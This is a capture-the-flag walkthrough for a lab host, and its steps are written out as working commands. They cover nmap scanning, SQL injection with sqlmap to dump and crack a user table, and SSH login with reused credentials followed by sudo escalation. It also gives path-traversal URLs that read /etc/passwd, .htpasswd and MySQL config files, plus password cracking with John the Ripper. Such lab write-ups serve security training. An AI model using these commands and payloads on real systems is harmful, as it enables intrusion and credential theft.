CTF4 solution

Scan the subnetwork

nmap -sn 10.10.10.0/24

Perform a full scan on the target

nmap -A 10.10.10.2

By looking at the robot.txt in nmap's output, we find a few interesting URLs:

• http://10.10.10.2/restricted leaks the Apache version, can be used to find exploits
• http://10.10.10.2/admin access to the website admin (sql injection possible in the login form, just disable some JS that sanitize the content client side)
• http://10.10.10.2/sql/db.sql leaks the schemas of the DB, useful during SQL injection
• http://10.10.10.2/conf indicate that there is some configuration in here, leaks Apache verion and and login name of the administrator (dstevens). He most likely has root access
• http://10.10.10.2/mail leaks version of the SquirrelMail, can be used to find exploits. This can also be exploited to have access to emails and search for valuable information.

Using sqlmap, we can crawl the website to find vulnerable URLs:

 sqlmap -u 'http://10.10.10.2' --crawl=3

It looks like this URL is vulnerable: http://10.10.10.2/index.html?page=blog&title=Blog&id=2. Since we already know a possible schema of the DB (nothing guarantees the script found in sql/db.sql has been run), we can try to dump the user table from tthe DB ehks right away:

sqlmap -u 'http://10.10.10.2/index.html?page=blog&title=Blog&id=2' -p id -D ehks -T user --dump

If the schema was unknown, we could also run this command first:

sqlmap -u 'http://10.10.10.2/index.html?page=blog&title=Blog&id=2' -p id --schema

When dumping the data, we try to break the passwords using sqlmaps' dictionary attack with the default wordlist. It works, and we obtain a list of credentials. We know that dstevens is the administrator of the server, so we try to login using ssh (nmap releaved ssh was running on default port, 22):

ssh dstevens@10.10.10.2

We can successfully open an ssh connection, meaning that the password found in the website's DB was reused as account credentials. One thing to check for quick wins is the history of the user:

history

It looks like dstevens has indeed a root access (sudo and su found in history). Based on this, we try to elevate as root:

sudo -s

Et voilà!

Other notable vulnerabilities:

• Local File Inclusion: http://10.10.10.2/index.html?page=blog is loading local files. Modifying the URL allows to retrieve more files:

  • http://10.10.10.2/index.html?page=../../../../../../etc/passwd%00
  • http://10.10.10.2/?page=../restricted/.htpasswd%00
  • http://10.10.10.2/?page=../../../../../etc/my.cnf%00

  This allows to retrieve the passwords without doing SQL injection.

• If we login using achen's account, we can find the root password in his bash history.

• If SQLmap fails to crack hashes, you can save them to a location (option proposed by sqlmap) and crack them later on with john the ripper:

    john hashes_dump --format=raw-md5
  

• The website is vulnerable to XSS. This can be revealed by nikto, as well as a lot more vulnerabilities:

     nikto -host 10.10.10.2
  

• Users can be enumerated using telnet on port 25 using the EXPN and VRFY commands

• The older 2.6.15 Linux kernel is vulnerable to some exploits: https://www.exploit-db.com/exploits/19933

• MySQL credentials are available in http://10.10.10.2/?page=../conf/config.ini%00